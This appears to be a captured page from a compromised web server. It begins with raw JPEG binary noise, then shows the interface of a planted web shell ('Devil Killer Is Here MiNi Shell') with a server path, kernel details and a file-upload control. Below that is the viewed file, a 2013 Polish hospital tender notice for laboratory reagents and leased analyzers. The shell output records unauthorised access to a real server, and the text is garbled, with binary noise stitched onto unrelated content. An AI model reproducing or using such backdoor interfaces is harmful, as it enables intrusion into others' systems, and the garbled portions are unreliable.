JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131003/203989-N-2013.html

<p class="kh_header"><b>Oleśnica: Przedmiotem zamówienia jest dostawa odczynników i materiałów zużywalnych wraz z dzierżawą analizatorów dla laboratoriów Powiatowego Zespołu Szpitali w Oleśnicy.</b><br>
<b>Numer ogłoszenia: 203989 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa odczynników i materiałów zużywalnych wraz z dzierżawą analizatorów dla laboratoriów Powiatowego Zespołu Szpitali w Oleśnicy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników i materiałów zużywalnych wraz z dzierżawą analizatorów dla laboratoriów Powiatowego Zespołu Szpitali w Oleśnicy.
Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr 2-6 do SIWZ.
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety:
Pakiet nr 1 - dostawa odczynników i materiałów zużywalnych do badań RKZ wraz z dzierżawą dwóch analizatorów dla laboratoriów w Oleśnicy i Sycowie
Pakiet nr 2 - dostawa odczynników i materiałów zużywalnych do badań biochemicznych wraz z dzierżawą analizatora dla laboratorium w Oleśnicy
Pakiet nr 3 - dostawa odczynników i materiałów zużywalnych do badań immunologicznych wraz z dzierżawą analizatora dla laboratorium w Sycowie
Pakiet nr 4 - dostawa odczynników i materiałów zużywalnych do oznaczania elektrolitów wraz z dzierżawą analizatora dla laboratorium w Sycowie
Pakiet nr 5 - dostawa odczynników i materiałów zużywalnych do badań biochemicznych wraz z dzierżawą analizatora dla laboratorium w Sycowie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 33.69.65.00-0, 38.43.45.20-7, 33.15.90.00-9, 38.43.45.80-5, 38.43.45.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o przedmiotowe zamówienie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz musi spełniać wszystkie warunki określone a art. 22 ust. 1 ustawy Prawo zamówień publicznych. Na potwierdzenie spełniania tego warunku Wykonawca musi złożyć oświadczenie według wzoru stanowiącego załącznik nr 8 do SIWZ oraz dokumenty wymienione w punkcie 10 a), b).

Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca w/w warunki spełnił. Niespełnienie któregoś z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o przedmiotowe zamówienie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz musi spełniać wszystkie warunki określone a art. 22 ust. 1 ustawy Prawo zamówień publicznych. Na potwierdzenie spełniania tego warunku Wykonawca musi złożyć oświadczenie według wzoru stanowiącego załącznik nr 8 do SIWZ oraz dokumenty wymienione w punkcie 10 a), b).

Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca w/w warunki spełnił. Niespełnienie któregoś z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o przedmiotowe zamówienie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz musi spełniać wszystkie warunki określone a art. 22 ust. 1 ustawy Prawo zamówień publicznych. Na potwierdzenie spełniania tego warunku Wykonawca musi złożyć oświadczenie według wzoru stanowiącego załącznik nr 8 do SIWZ oraz dokumenty wymienione w punkcie 10 a), b).

Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca w/w warunki spełnił. Niespełnienie któregoś z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o przedmiotowe zamówienie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz musi spełniać wszystkie warunki określone a art. 22 ust. 1 ustawy Prawo zamówień publicznych. Na potwierdzenie spełniania tego warunku Wykonawca musi złożyć oświadczenie według wzoru stanowiącego załącznik nr 8 do SIWZ oraz dokumenty wymienione w punkcie 10 a), b).

Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca w/w warunki spełnił. Niespełnienie któregoś z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) oświadczenie, że Wykonawca posiada w zakresie oferowanych wyrobów dokumenty zezwalające na ich wprowadzenie do obrotu i stosowania. 
b) jeżeli odrębne przepisy nie wymagają wpisu do rejestru, do oferty należy dołączyć dokument, z którego będzie wynikało, że osoba, która podpisała ofertę jest upoważniona do reprezentowania firmy.
c) deklaracja CE do każdego produktu - jeżeli jest wymagana
d) ulotki zawierające opis oferowanych odczynników i materiałów zużywalnych
e) do oferty należy dołączyć dokumenty potwierdzające spełnienie warunków/parametrów wymaganych oraz ocenianych.
f) metodyki oznaczeń i/lub inne materiały opisujące m.in. wymaganą procedurą kalibracji i kontroli analizatora.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi również zawierać następujące dokumenty i oświadczenia:
a)  wypełniony formularz asortymentowo-cenowy (odpowiednio załącznik nr 2-6 do SIWZ)
b) w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych i strony postanawiają, że jedyna dopuszczalna zmiana warunków umowy może dotyczyć ceny w części dotyczącej zmiany stawki podatku VAT oraz w przypadku niewyczerpania przez Zamawiającego wartości umowy w okresie jej trwania, Strony mają prawo do przedłużenia terminu obowiązywania umowy, bez zwiększania jej wartości. Strony dopuszczają również zmianę warunków umowy w zakresie numeru katalogowego produktu i nazwy produktu przy zachowaniu jego parametrów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 11:30, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - dostawa odczynników i materiałów zużywalnych do badań RKZ wraz z dzierżawą dwóch analizatorów dla laboratoriów w Oleśnicy i Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość planowanych badań:
Analizator Syców: 2500 w okresie umowy (24 miesiące)
Analizator Oleśnica - 12500 w okresie umowy (24 miesiące)
Oferta powinna obejmować wszystkie niezbędne do wykonania badań odczynniki i części zużywalne (elektrody, wężyki pomp itd.) z wyjątkiem materiałów kontrolnych.
Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania. 
Przy obliczaniu ilości potrzebnych opakowań Wykonawca uwzględni trwałość zestawów odczynnikowych na pokładzie analizatora. 
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego. 
Wykonawca pokrywa koszt podłączenia oferowanych analizatorów z laboratoryjnym systemem informatycznym e-lab, który zainstalowany jest w laboratoriach Zamawiającego. 
Warunki graniczne (wymagane) dot. analizatora parametrów krytycznych:
Parametry mierzone: pH, pCO2, pO2, Hct, Hb, SO2, Na, K, Cl, Ca
Wszystkie elektrody pomiarowe bezobsługowe
Dowolne definiowanie panelu parametrów mierzonych
Możliwość wykonania badań krwi pełnej, surowicy lub osoczu
Podanie próbki bezpośrednio ze strzykawki lub kapilary
Mała objętość analizowanej próbki
Odczynniki w zamkniętych oddzielnych pojemnikach, wymieniane zależnie od zużycia
Automatyczna kalibracja, jedno i dwupunktowa bez użycia zewnętrznych gazów kalibracyjnych
Termin ważności odczynników po instalacji w aparacie nie krótszy niż 30 dni
Zamknięte niezależne ścieki
Automatyczne procedury czyszczenia toru pomiarowego i kondycjonowania elektrod
Prosta komunikacja z operatorem - przejrzyste oprogramowanie 
Możliwość wpisania szczegółowych danych demograficznych pacjenta
Pamięć wyników pomiarów
Oprogramowanie kontroli jakości, pamięć wyników kontroli
Możliwość wprowadzania danych identyfikacyjnych próbki przy pomocy czytnika kodów kreskowych
Możliwość współpracy z laboratoryjnym systemem informatycznym (LIS)
Zabezpieczenie analizatora przy pomocy zasilacza UPS
Gwarancja i bezpłatny serwis w okresie umowy, (w tym obowiązkowy przegląd techniczny analizatora raz w roku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 33.69.65.00-0, 38.43.45.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - dostawa odczynników i materiałów zużywalnych do badań biochemicznych wraz z dzierżawą analizatora dla laboratorium w Oleśnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZESTAWIENIE PARAMETRÓW ANALIZATORA BIOCHEMICZNEGO:
Analizator fabrycznie nowy wyprodukowany nie wcześniej niż w IV kwartale 2012 (wykluczony analizator demonstracyjny)
Analizator w pełni automatyczny, wolnostojący
Wydajność analizatora minimum 400 oznaczeń fotometrycznych na godzinę i nie mniej niż 580 oznaczeń na godzinę z modułem ISE
Metody wykonywania oznaczeń:
- fotometria (w tym pomiary punktu końcowego i kinetyczne)
- turbidymetria
- elektrody jonoselektywne ISE do oznaczeń (Na K Cl)
Odczynniki płynne, analiza w fazie ciekłej
Zakres pomiarowy dla oznaczeń fotometrycznych - minimum 12 długości fal w zakresie 34-800 nm
Możliwości analityczne: enzymy, substraty, ISE, białka specyficzne, etanol
Możliwość wykonywania badań w surowicy, osoczu, moczu i hemolizacie
Automatyczne rozcieńczanie oznaczanej próbki, po przekroczeniu liniowości metody, maksymalne rozcieńczenie nie mniejsze niż 1:100
Pobieranie próbek i odczynników przez osobne igły pipetujące
Detektor skrzepu w badanym materiale
Możliwość wykonywania oznaczeń z próbek pierwotnych, próbek pediatrycznych oraz przelewanych
Kuwety wielokrotnego użytku myte na pokładzie analizatora
Rotor odczynnikowy - minimum 70 pozycji
Chłodzenie odczynników na pokładzie analizatora
Identyfikacja odczynników z wykorzystaniem kodów kreskowych i wewnętrznego czytnika tych kodów
Automatyczne monitorowanie objętości odczynników znajdujących się na pokładzie analizatora
Możliwość jednoczesnego umieszczenia na pokładzie minimum 70 próbek pacjentów
Identyfikacja próbek przy pomocy kodów kreskowych
Priorytetowe wykonywanie badań cito
Wydzielone pozycje dla próbek citowych
Stacja uzdatniania wody o wydajności dostosowanej do zużycia wody przez analizator
Oprogramowanie użytkownika w języku polskim 
Dokumentacja i archiwizacja krzywych kalibracyjnych oraz wyników kontroli i badań próbek pacjentów
Wbudowany program kontroli jakości umożliwiający graficzną prezentację wyników kontroli (wykresy Levey-Jennigsa) i możliwość stosowania reguł kontrolnych (Westgarda)
Współpraca z laboratoryjnym systemem informatycznym (LIS) - przesył danych z wykorzystaniem komunikacji dwukierunkowej 
Analizator wyposażony w komputer, i  zewnętrzny UPS umożliwiający podtrzymanie pracy analizatora w przypadku zaniku zasilania
Gwarancja techniczna na cały zestaw (z wyłączeniem części zużywalnych zapisanych w umowie) i bezpłatny serwis (w tym wymagane obowiązkowe przeglądy techniczne analizatora), przez cały okres trwania umowy
Czas reakcji serwisu - maksymalnie do 24 godzin (w dni robocze)
Potwierdzenie przez oferenta zgodności parametrów technicznych analizatora z wymogami specyfikacji (w tym parametrów ocenianych) stosownym opisem:
-powszechnie dostępna ulotka oferowanego analizatora
-specyfikacja techniczna
lub zapis z instrukcji technicznej
dołączone do oferty w formie pisemnej
Wykonawca uwzględni w ofercie zakup biochemicznej kontroli międzynarodowej w cyklach półrocznych (1 cykl - 13 próbek kontrolnych) przez cały okres trwania umowy
Wymagane parametry kontroli:
46 oznaczanych parametrów,
oznaczenia co 2 tygodnie, 
13 próbek w cyklu
możliwość elektronicznego przesyłania danych oraz zarejestrowania więcej niż jednego aparatu

Oceniane parametry	
Automatyczny podajnik statywów próbkowych, punktacja: Tak - 5 pkt, Nie - 0 pkt
Igła próbkowa do testów fotometrycznych, dwie niezależne igły dla odczynników R1 i R2 i oddzielna igła próbkowa dla modułu ISE, punktacja: Tak - 10 pkt, Nie - 0 pkt
W przypadku oznaczenia HbA1c możliwość uzyskania hemolizatu krwi pełnej automatycznie na pokładzie analizatora, punktacja: Tak - 10 pkt, Nie - 0 pkt
Zużycie wody nie większe niż 13 l/ godzinę, punktacja: Tak - 3 pkt, Nie - 0 pkt
Powietrzny inkubator kuwet reakcyjnych, punktacja: Tak - 2 pkt, Nie - 0 pkt
1. Odczynniki
1. Fosfataza alkaliczna - Ilość na 36 miesięcy: 6000
2. Aminotransferaza alaniniowa - Ilość na 36 miesięcy: 10700
3. Aminotransferaza asparaginowa - ilość: 11000
4. Amylaza - ilość: 4800
5. GGTP - ilość: 6900
6. Lipaza - ilość: 5400
7. Albumina - ilość: 750
8. Białko całkowite - ilość: 3200
9. Bilirubina całkowita - ilość: 	12550
10. Bilirubina bezpośrednia - ilość: 5100
11. cholesterol całkowity - ilość: 5000
12. Cholesterol HDL (bezpośredni) - ilość: 4200
13. Fosfor - ilość: 800
14. Glukoza (met. heksokinazowa) - ilość: 33700
15. Kreatynina - ilość: 34000
16. Kwas moczowy - ilość: 3500
17. Magnez - ilość: 3400
18. Mocznik - ilość: 29100
19. Trójglicerydy - ilość: 4400
20. Wapń - ilość: 2000
21. Żelazo - ilość: 1350
22. CRP - ilość: 25500
23. D-dimery - ilość: 2700
24. Hemoglobina glikowana (HbA1c) - ilość: 4100
25. Etanol - ilość: 1800
26. Białko w moczu/PMR	 - ilość: 2400
27. Sód (Na) - ilość: 43950
28. Potas (K) - ilość: 43950
29. Chlorki (Cl) - ilość: 7500
Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania
Przy obliczaniu ilości potrzebnych opakowań Wykonawca uwzględni trwałość zestawów odczynnikowych na pokładzie analizatora
Przy obliczaniu ilości potrzebnych opakowań odczynników do podanych wyżej ilości oznaczeń należy doliczyć niezbędne oznaczenia kalibracyjne
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. 
W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego 
zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.
									
2.Materiały kontrolne i kalibratory
Trwałość kalibratorów  i materiałów kontrolnych minimum 6 miesięcy od daty dostawy					
W przypadku materiałów kontrolnych Wykonawca uwzględni wykonywanie kontroli każdego parametru (z wyjątkiem D-dimerów poz. 23, 
Hemoglobiny glikowanej HbA1c - poz 24 i białka w moczu - poz. 26), codziennie, na 2 poziomach materiału kontrolnego
W przypadku materiałów kontrolnych do D-dimerów (poz. 23 zestawienia) Wykonawca uwzględni wykonywanie kontroli 2 razy w tygodniu 
na 2 poziomach.
W przypadku materiałów kontrolnych do Hemoglobiny glikowanej HbA1c (poz. 24 zestawienia) Wykonawca uwzględni wykonywanie 
kontroli 1 raz w tygodniu na 2 poziomach .
